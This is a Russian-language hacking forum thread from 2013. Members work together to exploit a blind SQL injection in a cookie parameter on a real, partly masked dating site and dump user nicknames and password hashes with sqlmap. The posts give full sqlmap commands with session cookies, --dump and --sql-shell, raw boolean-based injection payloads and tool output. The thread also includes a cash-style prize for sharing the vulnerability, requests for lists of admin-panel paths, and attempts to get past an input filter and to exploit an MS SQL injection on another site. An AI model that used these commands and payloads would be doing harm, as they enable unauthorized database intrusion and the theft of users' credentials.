Старый 03.06.2013, 23:39   #2881
NeuroZnanie
 
Регистрация: 10.07.2012
Сообщений: 7
Репутация: 4
По умолчанию

Доброго времени суток, господа. У меня вопрос. Блайнд в куках. Запрос sqlmap


python ./sqlmap.py --url="http://www.*e***l*.ru/script.php" --threads=5 --level=5 -b --cookie="__utma=11681585.1163264804.1367220649.1369 901808.1369911331.12; __utmz=11681585.1367220649.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); lasttime1=1370187087; nick=c**o; userid=33**97; password=9a340ff40b7***455b4c17da066ac00a; per1000=1.3; lasttime=1370176976; ocode=375***4; email=so***.bro%40gmail.com" --random-agent --dbms="MySQL" -p userid --charset="UTF 8" --dump -D loveumru_*e****l -T users -C password --start=10 --stop=11

Нужны колонки password, nick, id. Вывожу постепенно сначала password потом id и nick. На выводе

Table: users
[2 entries]
+----------------------------------+
| password |
+----------------------------------+
| 00018c5ea874****77fd119da95b5d2 |
| 00018f2d0ec71d5****2dcf8cb20b8 |
+----------------------------------+
+------+
| id |
+------+
| 1343 |
| 1344 |
+------+

+--------------+
| nick |
+--------------+
| D**Sh* |
| i**he**ov49 |
+--------------+

Но записи не совпадают. Хеш расшифровывается но пароль первого хеша не подходит первому нику. Как сделать совместимый вывод? Поделюсь уязвимостью с тем кто поможет.Один из крупнейших сайтов уникального контента.
NeuroZnanie вне форума   Ответить с цитированием
Старый 04.06.2013, 00:15   #2882
elk
 
Регистрация: 07.03.2013
Сообщений: 19
Репутация: 1
По умолчанию

Да, у меня такое тоже бывает! Иногда колонки почему-то по разному упорядочиваются(особенно в джумле).
Сделай так:
Код:
python ./sqlmap.py --url="http://www.*e***l*.ru/script.php" --threads=5 --level=5 -b --cookie="__utma=11681585.1163264804.1367220649.1369 901808.1369911331.12; __utmz=11681585.1367220649.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); lasttime1=1370187087; nick=c**o; userid=33**97; password=9a340ff40b7***455b4c17da066ac00a; per1000=1.3; lasttime=1370176976; ocode=375***4; email=so***.bro%40gmail.com" --random-agent --dbms="MySQL" -p userid --sql-shell
выскочит следующее
sql-shell> сюда полноценный скл-запрос
sql-shell> select nick,password from loveumru_*e****.users where id=10
Я теперь сразу так делаю...

Последний раз редактировалось elk; 04.06.2013 в 00:17..
elk вне форума   Ответить с цитированием
Старый 04.06.2013, 00:36   #2883
NeuroZnanie
 
Регистрация: 10.07.2012
Сообщений: 7
Репутация: 4
По умолчанию

Цитата:
Сообщение от elk Посмотреть сообщение
Да, у меня такое тоже бывает! Иногда колонки почему-то по разному упорядочиваются(особенно в джумле).
Сделай так:
Код:
python ./sqlmap.py --url="http://www.*e***l*.ru/script.php" --threads=5 --level=5 -b --cookie="__utma=11681585.1163264804.1367220649.1369 901808.1369911331.12; __utmz=11681585.1367220649.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); lasttime1=1370187087; nick=c**o; userid=33**97; password=9a340ff40b7***455b4c17da066ac00a; per1000=1.3; lasttime=1370176976; ocode=375***4; email=so***.bro%40gmail.com" --random-agent --dbms="MySQL" -p userid --sql-shell
выскочит следующее
sql-shell> сюда полноценный скл-запрос
sql-shell> select nick,password from loveumru_*e****.users where id=10
Я теперь сразу так делаю...
Код:
sql-shell> select password from loveumru_*e***l.users where id=10 
[23:28:45] [INFO] fetching SQL SELECT statement query output: 'select password from loveumru_*e***l.users where id=10 '
[23:28:45] [INFO] retrieved: 
[23:28:46] [WARNING] the SQL query provided does not return any output
[23:28:46] [INFO] retrieved: 0
sql-shell>
В блайндах по ходу не реботает sql-shell.

Сами запросы:

На подбор колонок nick

Код:
336097 AND ORD(MID((SELECT IFNULL(CAST(nick AS CHAR),0x20) FROM loveumru_*e***l.users ORDER BY nick LIMIT 11,1),1,1))>64
password

Код:
336097 AND ORD(MID((SELECT IFNULL(CAST(password AS CHAR),0x20) FROM loveumru_*e***l.users ORDER BY password LIMIT 11,1),3,1))>96
id

Код:
336097 AND ORD(MID((SELECT IFNULL(CAST(id AS CHAR),0x20) FROM loveumru_*e***l.users ORDER BY id LIMIT 11,1),1,1))>4194192

Последний раз редактировалось NeuroZnanie; 04.06.2013 в 00:45..
NeuroZnanie вне форума   Ответить с цитированием
Старый 04.06.2013, 11:12   #2884
elk
 
Регистрация: 07.03.2013
Сообщений: 19
Репутация: 1
По умолчанию

Цитата:
В блайндах по ходу не реботает sql-shell.
Работает, и лучше всего! ;-)
Цитата:
[23:28:46] [INFO] retrieved: 0
Это лишь значит, что с таким id нету юзера в таблице. (у тебя же есть 2 вывода: 1343 и 1344)
Попробуй добиться хоть какого-нибудь вывода через скл-шелл, к примеру:
Цитата:
select password from loveumru_*e***l.users where id>10 (=1343,=1344)
select id from loveumru_*e***l.users where nick like '%a%'
Цитата:
В блайндах
И уточни тип уязвимости, ключом --technique B и убери -b (ну и --level=5 уже не нужен, коли дырка найдена), --dbms=MySQL (без кавычек)
Цитата:
python ./sqlmap.py --url="http://www.*e***l*.ru/script.php" --technique B --threads=5 --cookie="***" --random-agent --dbms=MySQL -p userid --sql-shell

Последний раз редактировалось elk; 04.06.2013 в 11:20..
elk вне форума   Ответить с цитированием
Старый 04.06.2013, 14:28   #2885
NeuroZnanie
 
Регистрация: 10.07.2012
Сообщений: 7
Репутация: 4
По умолчанию

elk, --level используеться единожды до того как баг был найден, --dbms плевать на то есть или нет кавычек, --technique лучше не выставлять в данном случае потому что
Код:
[12:58:42] [WARNING] the SQL query provided does not return any output
[12:58:42] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[12:58:43] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..        
[12:58:44] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[12:58:45] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
Но все равно в целом ты красавчик и метод сработал. Приз нужен тебе?)
NeuroZnanie вне форума   Ответить с цитированием
Старый 04.06.2013, 15:05   #2886
elk
 
Регистрация: 07.03.2013
Сообщений: 19
Репутация: 1
По умолчанию

Цитата:
time-based
А я думал, что Boolean-based
Тогда тебе нужно указать --technique T и без потоков (--threads 5)
Цитата:
Приз нужен тебе?)
Ну раз обещал)
elk вне форума   Ответить с цитированием
Старый 06.06.2013, 15:43   #2887
NeuroZnanie
 
Регистрация: 10.07.2012
Сообщений: 7
Репутация: 4
По умолчанию

Господа, подкинте хорошенький список директорий админок и мускула. Помню ettee выкладывал годный список с личного опыта на 18к записей, но он проебался к сожалению, а форума того уже нету(. Только актуальный список а не dirbustera.
NeuroZnanie вне форума   Ответить с цитированием
Старый 11.06.2013, 02:58   #2888
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 94
Репутация: 6
По умолчанию

Есть вопрос.
Имеется выполнение кода в адресной строке но только посредством <? code; ?>
Фильтруются знаки < и >
URL HEX encode всё опробовал уже
Есть у кого ещё какие идеи обойти????через пост тоже облом.
Faaax вне форума   Ответить с цитированием
Старый 14.06.2013, 22:17   #2889
vikler1
 
Регистрация: 10.06.2013
Сообщений: 6
Репутация: 0
По умолчанию

Помогите плиз в раскрутке уязвимости. Есть сайт
Код:
http://**************.com/site/Gallery/Gallery.aspx?ev=cc19c288176'
Ошибка вида:
Код:
Incorrect syntax near 'cc19c288176' '.
Unclosed quotation mark after the character string 'cc19c288176' '.
Однако sqlmap упорно говорит, что параметр ev не injectible... Что делать? Помогите нубу плиз
vikler1 вне форума   Ответить с цитированием
Старый 15.06.2013, 06:26   #2890
Twost
 
Аватар для Twost
 
Регистрация: 03.07.2010
Сообщений: 172
Репутация: 110
По умолчанию

Цитата:
Сообщение от vikler1 Посмотреть сообщение
Помогите плиз в раскрутке уязвимости. Есть сайт
Код:
http://**************.com/site/Gallery/Gallery.aspx?ev=cc19c288176'
Ошибка вида:
Код:
Incorrect syntax near 'cc19c288176' '.
Unclosed quotation mark after the character string 'cc19c288176' '.
Однако sqlmap упорно говорит, что параметр ev не injectible... Что делать? Помогите нубу плиз
1) MS SQL
2) Фильтруются некоторые символы
3) Нуб хочет научится, или нуб хочет юзать sqlmap? Если второе - думаю дела плохи.
Twost вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot